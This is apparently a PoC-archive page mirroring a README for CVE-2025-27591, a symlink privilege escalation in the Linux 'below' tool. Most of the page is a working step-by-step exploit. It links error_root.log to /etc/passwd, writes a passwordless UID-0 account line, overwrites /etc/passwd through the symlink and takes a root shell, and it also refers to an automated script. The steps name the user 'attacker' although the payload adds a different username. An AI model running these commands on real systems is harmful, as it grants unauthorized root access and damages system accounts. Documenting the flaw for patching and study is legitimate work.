Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-27591 PoC — below 安全漏洞

Source
https://github.com/dollarboysushil/Linux-Privilege-Escalation-CVE-2025-27591
Associated Vulnerability
Title:below 安全漏洞 (CVE-2025-27591)
Description:below是Meta Incubator开源的一个现代 Linux 系统的资源监视器。 below v0.9.0之前版本存在安全漏洞,该漏洞源于创建了全局可写目录,可能导致通过符号链接攻击提升到root权限。
Description
CVE-2025-27591 is a known privilege escalation vulnerability in the Below service (version < v0.9.0)
Readme
# CVE-2025-27591 - Privilege Escalation via Writable Symlink in `below`

## Summary

This is a simple exploit for **CVE-2025-27591**, a local privilege escalation vulnerability in the `below` Linux system monitoring tool. The vulnerability affects versions prior to v0.9.0 and stems from incorrect permission assignments in the system. The issue was discovered in January 2025 and publicly disclosed on March 12, 2025 (SecurityOnline, OpenWall). When `below` is run with `sudo`, it may log errors into a world-writable directory (`/var/log/below`), allowing attackers to symlink a log file to sensitive targets like `/etc/passwd`.

By exploiting this, an unprivileged user with `sudo` access to `below` can escalate privileges to root.

---

## Vulnerability Details

- **CVE ID**: CVE-2025-27591
- **Vulnerable Tool**: `below`
- **Affected Feature**: Logging via `below record`
- **Vulnerable Path**: `/var/log/below/error_root.log`
- **Attack Prerequisites**:
  - The directory `/var/log/below` is world-writable
  - The attacker can run `sudo /usr/bin/below record` without a password

---

# Exploit Steps (Manual)

✅ Step 1: Verify world-writable log directory
You should see:

```bash
drwxrwxrwx 2 root root 4096 ... /var/log/below
```

![alt text](/Images/image.png)

✅ Step 2: Remove any existing `error_root.log`

```bash
rm -f /var/log/below/error_root.log
```

✅ Step 3: Create a symlink to /etc/passwd

```bash
ln -s /etc/passwd /var/log/below/error_root.log
```

then check using

```bash
ls -la /var/log/below/error_root.log
# should show: error_root.log -> /etc/passwd
```

![alt text](/Images/image2.png)

✅ Step 4: Create a payload file
This will add a new root user attacker with no password:

```bash
echo 'dollarboysushil::0:0:dollarboysusil:/root:/bin/bash' > /tmp/payload
```

file structure

```bash
username:password:UID:GID:comment(home/full name):home_directory:shell
```

key thing here is, UID and GUID
we are setting UID and GUID to 0 making it user a root user and Group ID = root group
![alt text](/Images/image3.png)

✅ Step 5: Trigger log write as root
This is the core of the exploit.

```bash
sudo /usr/bin/below record
```

This command is expected to fail or timeout — but it will try to write error logs to /var/log/below/error_root.log, which is actually /etc/passwd.
💡 In some cases, this alone may corrupt /etc/passwd — so we overwrite it fully next.

✅ Step 6: Overwrite /etc/passwd via symlink

```bash
cp /tmp/payload /var/log/below/error_root.log
```

![alt text](/Images/image4.png)

✅ Step 7: Become root

```bash
su attacker
```

You'll drop into a root shell, no password needed.
![alt text](/Images/image5.png)

# Exploit Steps (Automatic)

```bash
python3 dbs_exploit.py
```

![alt text](/Images/image6.png)
File Snapshot

 [4.0K]  /data/pocs/874472d058b230707d5a04a2ae4bb73e075b3b6a
├── [1.6K]  dbs_exploit.py
├── [4.0K]  Images
│   ├── [137K]  image2.png
│   ├── [ 77K]  image3.png
│   ├── [ 23K]  image4.png
│   ├── [ 94K]  image5.png
│   ├── [268K]  image6.png
│   └── [ 45K]  image.png
└── [2.7K]  README.md

1 directory, 8 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.